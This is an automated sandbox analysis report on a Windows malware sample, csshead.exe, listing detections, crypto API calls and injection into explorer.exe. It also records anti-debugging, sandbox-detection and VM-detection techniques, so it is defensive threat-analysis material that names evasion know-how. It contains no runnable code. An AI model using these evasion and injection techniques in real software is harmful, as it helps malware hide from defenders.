Analysis Report

Overview

General Information

Joe Sandbox Version:	23.0.0
Analysis ID:	56303
Start time:	15:34:04
Joe Sandbox Product:	Cloud
Start date:	03.07.2018
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	csshead (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	W10 Native physical Machine for testing VM-aware malware (Office 2010, Java 1.8.0_91, Flash 22.0.0.192, Acrobat Reader DC 15.016.20039, Internet Explorer 11, Chrome 55, Firefox 50)
Number of analysed new started processes analysed:	2
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled HDC enabled
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.evad.winEXE@3/0@0/0
HCA Information:	Successful, ratio: 74% Number of executed functions: 106 Number of non-executed functions: 246
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 45.7% (good quality ratio 42.1%) Quality average: 80.9% Quality standard deviation: 30.5%
Cookbook Comments:	Adjust boot time Correcting counters for adjusted boot time

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	76	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")

Sample reads itself and does not show any behavior, likely it performs some host environment checks which are compared to an embedded key

Sample tries to load a library which is not present or installed on the analysis machine, adding the library might reveal more behavior

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus detection for unpacked file

Show sources

Source: 0.2.csshead.exe.50000.0.unpack	Avira: Label: TR/Crypt.XPACK.Gen
Source: 0.2.csshead.exe.400000.1.unpack	Avira: Label: HEUR/AGEN.1023574
Source: 0.0.csshead.exe.400000.0.unpack	Avira: Label: TR/Patched.Gen
Source: 1.2.explorer.exe.790000.2.unpack	Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.explorer.exe.770000.1.unpack	Avira: Label: TR/Crypt.XPACK.Gen
Source: 0.1.csshead.exe.400000.0.unpack	Avira: Label: TR/Patched.Gen

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Show sources

Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_004017A2 CryptDecrypt,CryptDecrypt,	0_2_004017A2
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_0040153C CryptGenRandom,CryptGenRandom,	0_2_0040153C
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00401402 CryptHashData,CryptHashData,	0_2_00401402
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_004017A4 CryptDecrypt,CryptDecrypt,	0_2_004017A4
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00401AAE CryptEncrypt,CryptEncrypt,	0_2_00401AAE
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_004017E8 CryptAcquireContextA,CryptAcquireContextA,	0_2_004017E8
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00401574 CryptSetKeyParam,CryptSetKeyParam,	0_2_00401574
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00401AB0 CryptEncrypt,CryptEncrypt,	0_2_00401AB0
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00401374 CryptCreateHash,CryptCreateHash,	0_2_00401374
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_004018A0 CryptImportKey,CryptImportKey,	0_2_004018A0
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_004014D0 CryptDestroyHash,CryptDestroyHash,	0_2_004014D0
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00401490 CryptGetHashParam,CryptGetHashParam,	0_2_00401490
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00401404 CryptHashData,CryptHashData,	0_2_00401404
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00401AF8 CryptDestroyKey,CryptDestroyKey,	0_2_00401AF8
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00401B20 CryptReleaseContext,CryptReleaseContext,	0_2_00401B20
Source: C:\Windows\explorer.exe	Code function: 1_2_007714D0 CryptDestroyHash,CryptDestroyHash,	1_2_007714D0
Source: C:\Windows\explorer.exe	Code function: 1_2_00771404 CryptHashData,CryptHashData,	1_2_00771404
Source: C:\Windows\explorer.exe	Code function: 1_2_00771AF8 CryptDestroyKey,CryptDestroyKey,	1_2_00771AF8
Source: C:\Windows\explorer.exe	Code function: 1_2_00771402 CryptHashData,CryptHashData,	1_2_00771402
Source: C:\Windows\explorer.exe	Code function: 1_2_00771574 CryptSetKeyParam,CryptSetKeyParam,	1_2_00771574
Source: C:\Windows\explorer.exe	Code function: 1_2_00771AAE CryptEncrypt,CryptEncrypt,	1_2_00771AAE
Source: C:\Windows\explorer.exe	Code function: 1_2_007717E8 CryptAcquireContextA,CryptAcquireContextA,	1_2_007717E8
Source: C:\Windows\explorer.exe	Code function: 1_2_00771B20 CryptReleaseContext,CryptReleaseContext,	1_2_00771B20
Source: C:\Windows\explorer.exe	Code function: 1_2_007717A2 CryptDecrypt,CryptDecrypt,	1_2_007717A2
Source: C:\Windows\explorer.exe	Code function: 1_2_00771AB0 CryptEncrypt,CryptEncrypt,	1_2_00771AB0
Source: C:\Windows\explorer.exe	Code function: 1_2_007718A0 CryptImportKey,CryptImportKey,	1_2_007718A0
Source: C:\Windows\explorer.exe	Code function: 1_2_00771490 CryptGetHashParam,CryptGetHashParam,	1_2_00771490
Source: C:\Windows\explorer.exe	Code function: 1_2_00771374 CryptCreateHash,CryptCreateHash,	1_2_00771374
Source: C:\Windows\explorer.exe	Code function: 1_2_0077153C CryptGenRandom,CryptGenRandom,	1_2_0077153C
Source: C:\Windows\explorer.exe	Code function: 1_2_007717A4 CryptDecrypt,CryptDecrypt,	1_2_007717A4

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)

Show sources

Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_004018A0 CryptImportKey,CryptImportKey,		0_2_004018A0
Source: C:\Windows\explorer.exe	Code function: 1_2_007718A0 CryptImportKey,CryptImportKey,		1_2_007718A0

Software Vulnerabilities:

Found inlined nop instructions (likely shell or obfuscated code)

Show sources

Source: C:\Users\user\Desktop\csshead.exe	Code function: 4x nop then pop ecx	0_2_00409178
Source: C:\Users\user\Desktop\csshead.exe	Code function: 4x nop then pop ecx	0_2_00409147
Source: C:\Windows\explorer.exe	Code function: 4x nop then pop ecx	1_2_00779147
Source: C:\Windows\explorer.exe	Code function: 4x nop then pop ecx	1_2_00779178

Networking:

Contains functionality to upload files via FTP

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Code function: 0_2_00419D20 CoInitialize,NtdllDefWindowProc_A,GetCommandLineA,CreateMenu,LoadBitmapA,AppendMenuA,BeginDeferWindowPos,CreateMetaFileA,SetBrushOrgEx,LoadImageA,FtpPutFileEx,GetSysColorBrush,FrameRect,GlobalAlloc,GetLastError,GetIconInfo,GetIconInfo,mmioSetInfo,mmioAscend,GetSystemInfo,GetSystemTimeAsFileTime,SetConsoleCtrlHandler,CreateIoCompletionPort,CopyImage,DrawMenuBar,FindResourceA,VirtualAlloc,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,Loa

0_2_00419D20

Contains functionality to download additional files from the internet

Show sources

Source: C:\Windows\explorer.exe

Code function: 1_2_007715B0 InternetReadFile,

1_2_007715B0

Urls found in memory or binary data

Show sources

Source: csshead.exe, explorer.exe

String found in binary or memory: https://

Data Obfuscation:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Code function: 0_2_00401928 LoadLibraryA,GetProcAddress,

0_2_00401928

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_0040949C push 004094C8h; ret	0_2_004094C0
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_004094E0 push 00409506h; ret	0_2_004094FE
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_0040103C push 00401068h; ret	0_2_00401060
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_0040107C push 004010A8h; ret	0_2_004010A0
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00429267 push ebx; ret	0_2_00429268
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00429F35 push ecx; ret	0_2_00429F48
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00432D21 pushfd ; retf 0043h	0_2_00432D22
Source: C:\Windows\explorer.exe	Code function: 1_2_0077949C push 007794C8h; ret	1_2_007794C0
Source: C:\Windows\explorer.exe	Code function: 1_2_007794E0 push 00779506h; ret	1_2_007794FE
Source: C:\Windows\explorer.exe	Code function: 1_2_0077103C push 00771068h; ret	1_2_00771060
Source: C:\Windows\explorer.exe	Code function: 1_2_0077107C push 007710A8h; ret	1_2_007710A0

Spreading:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00403988 FindFirstFileA,FindClose,	0_2_00403988
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00405640 SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405640
Source: C:\Windows\explorer.exe	Code function: 1_2_00775640 SHGetSpecialFolderPathA,FindFirstFileA,FindNextFileA,FindClose,	1_2_00775640
Source: C:\Windows\explorer.exe	Code function: 1_2_00773988 FindFirstFileA,FindClose,	1_2_00773988

System Summary:

Contains functionality to call native functions

Show sources

Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00404E94 NtQueryInformationProcess,ReadProcessMemory,	0_2_00404E94
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00408A48 PostQuitMessage,NtdllDefWindowProc_A,	0_2_00408A48
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00404DE0 NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,	0_2_00404DE0
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00408A44 NtdllDefWindowProc_A,	0_2_00408A44
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00419D20 CoInitialize,NtdllDefWindowProc_A,GetCommandLineA,CreateMenu,LoadBitmapA,AppendMenuA,BeginDeferWindowPos,CreateMetaFileA,SetBrushOrgEx,LoadImageA,FtpPutFileEx,GetSysColorBrush,FrameRect,GlobalAlloc,GetLastError,GetIconInfo,GetIconInfo,mmioSetInfo,mmioAscend,GetSystemInfo,GetSystemTimeAsFileTime,SetConsoleCtrlHandler,CreateIoCompletionPort,CopyImage,DrawMenuBar,FindResourceA,VirtualAlloc,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadLibraryA,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,LoadIconA,OleCreatePictureIndirect,LoadLibraryA,Loa	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00417E60 SetWindowLongA,NtdllDefWindowProc_A,	0_2_00417E60
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00417ED0 SetWindowLongA,GetWindowLongA,OleUninitialize,OleInitialize,GetWindowTextLengthA,GetWindowTextA,SetWindowTextA,GlobalAlloc,GlobalFix,GlobalUnWire,lstrlen,SetWindowLongA,NtdllDefWindowProc_A,	0_2_00417ED0
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00418190 SetWindowLongA,GetWindowLongA,OleUninitialize,OleInitialize,GetWindowTextLengthA,GetWindowTextA,SetWindowTextA,GlobalAlloc,GlobalFix,GlobalUnWire,SysFreeString,lstrlen,SysFreeString,SetWindowLongA,SysFreeString,NtdllDefWindowProc_A,	0_2_00418190
Source: C:\Windows\explorer.exe	Code function: 1_2_00778A48 PostQuitMessage,NtdllDefWindowProc_A,	1_2_00778A48
Source: C:\Windows\explorer.exe	Code function: 1_2_00774E94 NtQueryInformationProcess,ReadProcessMemory,	1_2_00774E94
Source: C:\Windows\explorer.exe	Code function: 1_2_00778A44 NtdllDefWindowProc_A,	1_2_00778A44
Source: C:\Windows\explorer.exe	Code function: 1_2_00774DE0 NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,ReadProcessMemory,	1_2_00774DE0

Detected potential crypto function

Show sources

Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00405D20	0_2_00405D20
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00419D20	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_0041C95B	0_2_0041C95B
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_0043256D	0_2_0043256D
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00430D58	0_2_00430D58
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00423AD0	0_2_00423AD0
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00430807	0_2_00430807
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_004302B6	0_2_004302B6
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_0042E76B	0_2_0042E76B
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_1_0041C95B	0_1_0041C95B
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_1_0043256D	0_1_0043256D
Source: C:\Windows\explorer.exe	Code function: 1_2_00775D20	1_2_00775D20

Found potential string decryption / allocating functions

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Code function: String function: 00429EF0 appears 34 times

PE file contains strange resources

Show sources

Source: csshead.exe

Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST

Sample file is different than original file name gathered from version info

Show sources

Source: csshead.exe

Binary or memory string: OriginalFilenametemplate.exeJ vs csshead.exe

Sample reads its own file content

Show sources

Source: C:\Users\user\Desktop\csshead.exe

File read: C:\Users\user\Desktop\csshead.exe

Jump to behavior

Tries to load missing DLLs

Show sources

Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Section loaded: open.dll	Jump to behavior

Classification label

Show sources

Source: classification engine

Classification label: mal76.evad.winEXE@3/0@0/0

Contains functionality to instantiate COM classes

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Code function: 0_1_0041C95B EnumPrintersA,EnumPrintersA,OpenColorProfileA,OpenColorProfileA,EnumPrintersA,EnumPrintersA,LoadLibraryA,LoadIconA,LoadIconA,800001A3,800001A3,GetHGlobalFromStream,LoadLibraryA,LoadIconA,800001A3,GetHGlobalFromStream,EnumPrintersA,EnumPrintersA,GetDC,CreateEventA,GetClassLongA,SetClassLongA,GetCursorPos,GetCursorPos,CreateStreamOnHGlobal,CommDlgExtendedError,WaitForSingleObject,WaitNamedPipeA,CreateFileA,WaitNamedPipeA,CreateFileA,SetNamedPipeHandleState,CloseHandle,CloseHandle,WriteFile,ReadFile,WriteFile,CloseHandle,ReadFile,CloseHandle,LookupAccountNameA,LookupAccountNameA,GetLastError,GetLastError,GetLastError,GetLastError,LocalAlloc,LocalAlloc,GetLastError,LocalAlloc,GetLastError,LookupAccountNameA,GetLastError,LocalFree,SetStretchBltMode,SetStretchBltMode,SetAbortProc,DrawFrameControl,LoadImageA,SetWindowLongA,SetWindowLongA,CreateEventA,GetCursorPos,GetCursorPos,DragQueryFileA,GetNumberOfPhysicalMonitorsFromHMONITOR,CreateRectRgnIndirect,WaitForSingleObject,EnableMenuItem,CoInitializeEx,CoC

0_1_0041C95B

Contains functionality to load and extract PE file embedded resources

Show sources

Source: C:\Users\user\Desktop\csshead.exe

0_2_00419D20

Launches a second explorer.exe instance

Show sources

Source: unknown	Process created: C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\csshead.exe	Process created: C:\Windows\explorer.exe			Jump to behavior

Might use command line arguments

Show sources

Source: C:\Users\user\Desktop\csshead.exe	Command line argument: Profile	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: .icm	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: (XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: Profile	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: .icm	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: DXC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: <XC	0_2_00419D20
Source: C:\Users\user\Desktop\csshead.exe	Command line argument: (XC	0_2_00419D20

PE file has an executable .text section and no other executable section

Show sources

Source: csshead.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Reads software policies

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Spawns processes

Show sources

Source: unknown	Process created: C:\Users\user\Desktop\csshead.exe 'C:\Users\user\Desktop\csshead.exe'
Source: unknown	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe
Source: C:\Users\user\Desktop\csshead.exe	Process created: C:\Windows\explorer.exe C:\Windows\explorer.exe	Jump to behavior

Binary contains paths to debug symbols

Show sources

Source:

Binary string: C:\As\Release\2000s.pdb source: csshead.exe

HIPS / PFW / Operating System Protection Evasion:

Injects code into the Windows Explorer (explorer.exe)

Show sources

Source: C:\Users\user\Desktop\csshead.exe	Memory written: PID: 972 base: B0000 value: 43	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Memory written: PID: 972 base: 2431E8 value: 00	Jump to behavior
Source: C:\Users\user\Desktop\csshead.exe	Memory written: PID: 972 base: 12D46B0 value: 55	Jump to behavior

Writes to foreign memory regions

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Memory written: C:\Windows\explorer.exe base: 12D46B0

Jump to behavior

Contains functionality to add an ACL to a security descriptor

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Code function: 0_2_00404406 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,

0_2_00404406

Contains functionality to create a new security descriptor

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Code function: 0_2_004041C8 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,AllocateAndInitializeSid,EqualSid,FreeSid,

0_2_004041C8

Anti Debugging:

Found API chain indicative of debugger detection

Show sources

Source: C:\Windows\explorer.exe	Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep			graph_1-5244
Source: C:\Users\user\Desktop\csshead.exe	Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep			graph_0-20617

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Code function: 0_2_004010B4 rdtsc

0_2_004010B4

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Code function: 0_2_00406D40 IsDebuggerPresent,

0_2_00406D40

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Code function: 0_2_004239DD VirtualProtect ?,-00000001,00000104,?

0_2_004239DD

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Code function: 0_2_00401928 LoadLibraryA,GetProcAddress,

0_2_00401928

Contains functionality to read the PEB

Show sources

Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_004024F8 mov eax, dword ptr fs:[00000030h]	0_2_004024F8
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_01961560 mov eax, dword ptr fs:[00000030h]	0_2_01961560
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_01963134 mov eax, dword ptr fs:[00000030h]	0_2_01963134
Source: C:\Windows\explorer.exe	Code function: 1_2_007724F8 mov eax, dword ptr fs:[00000030h]	1_2_007724F8

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Code function: 0_2_00401460 GetProcessHeap,RtlReAllocateHeap,

0_2_00401460

Program does not show much activity (idle)

Show sources

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Contains functionality to register its own exception handler

Show sources

Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_0042CA48 SetUnhandledExceptionFilter,	0_2_0042CA48
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00424FEB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00424FEB
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00429814 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00429814
Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_1_0042CA48 SetUnhandledExceptionFilter,	0_1_0042CA48

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)

Show sources

Source: C:\Users\user\Desktop\csshead.exe	Code function: 0_2_00406B18		0_2_00406B18
Source: C:\Windows\explorer.exe	Code function: 1_2_00776B18		1_2_00776B18

Contains functionality to detect sleep reduction / modifications

Show sources

Source: C:\Windows\explorer.exe	Code function: 1_2_00776DB0 GetTickCount,Sleep,GetTickCount,		1_2_00776DB0
Source: C:\Windows\explorer.exe	Code function: 1_2_00776DC8 GetTickCount,Sleep,GetTickCount,		1_2_00776DC8

Found evasive API chain (may execute only at specific dates)

Show sources

Source: C:\Windows\explorer.exe

Evasive API call chain: GetSystemTime,DecisionNodes,Sleep

graph_1-4754

Found stalling execution ending in API Sleep call

Show sources

Source: C:\Windows\explorer.exe

Stalling execution: Execution stalls by calling Sleep

graph_1-4543

Tries to detect sandboxes and other dynamic analysis tools (process name or module)

Show sources

Source: csshead.exe, 00000000.00000002.16598505108.00594000.00000004.sdmp	Binary or memory string: SBIEDLL.DLL
Source: csshead.exe, 00000000.00000002.16598505108.00594000.00000004.sdmp	Binary or memory string: SBIEDLL.DLL

Contains capabilities to detect virtual machines

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion

Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Show sources

Source: C:\Users\user\Desktop\csshead.exe

Code function: 0_2_004010B4 rdtsc

0_2_004010B4

Found evasive API chain (date check)

Show sources

